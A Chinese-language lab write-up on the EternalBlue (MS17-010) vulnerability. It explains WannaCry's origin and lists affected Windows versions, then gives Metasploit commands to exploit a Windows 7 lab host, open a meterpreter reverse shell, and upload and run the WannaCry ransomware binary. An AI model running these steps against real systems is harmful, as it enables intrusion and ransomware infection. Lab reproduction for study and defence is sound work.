参考文章 1
参考文章 2

一、漏洞简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

4、漏洞复现:

实验环境:

  • 攻击机:Kali-Linux IP:192.168.47.129
  • 靶机 Win 7 64位 IP:192.168.47.128

实验工具:

  • metasploit
  • MS17-010
  • wcry.exe

实验步骤:

  • 扫描靶机是否开启 445 端口
    nmap -sS 192.168.47.128

  • 打开漏洞利用工具 msfconsole
    msfconsole

  • 查询 MS17-010 漏洞模块
    search ms17-010

  • 利用永恒之蓝漏洞
    use exploit/windows/smb/ms17_010_eternalblue

  • 设置 payload
    set payload windows/x64/meterpreter/reverse_tcp

  • 设置本机 IP
    set LHOST 192.168.47.129

  • 设置受害主机 IP
    set RHOST 192.168.47.128

  • 设置端口 445
    set RPORT 445

  • 漏洞利用
    exploit

  • 解决 Windwos 命令行乱码
    chcp 65001

  • 查看当前路径
    pwd

  • 查看当前目录下文件
    ls

  • 进入 C 盘根目录
    cd C:\

  • 上传 勒索病毒至win 7 系统
    upload /home/kali/wcry.exe c:\

  • 进入 Win 7 终端
    shell

  • 执行 wcry.exe
    wcry.exe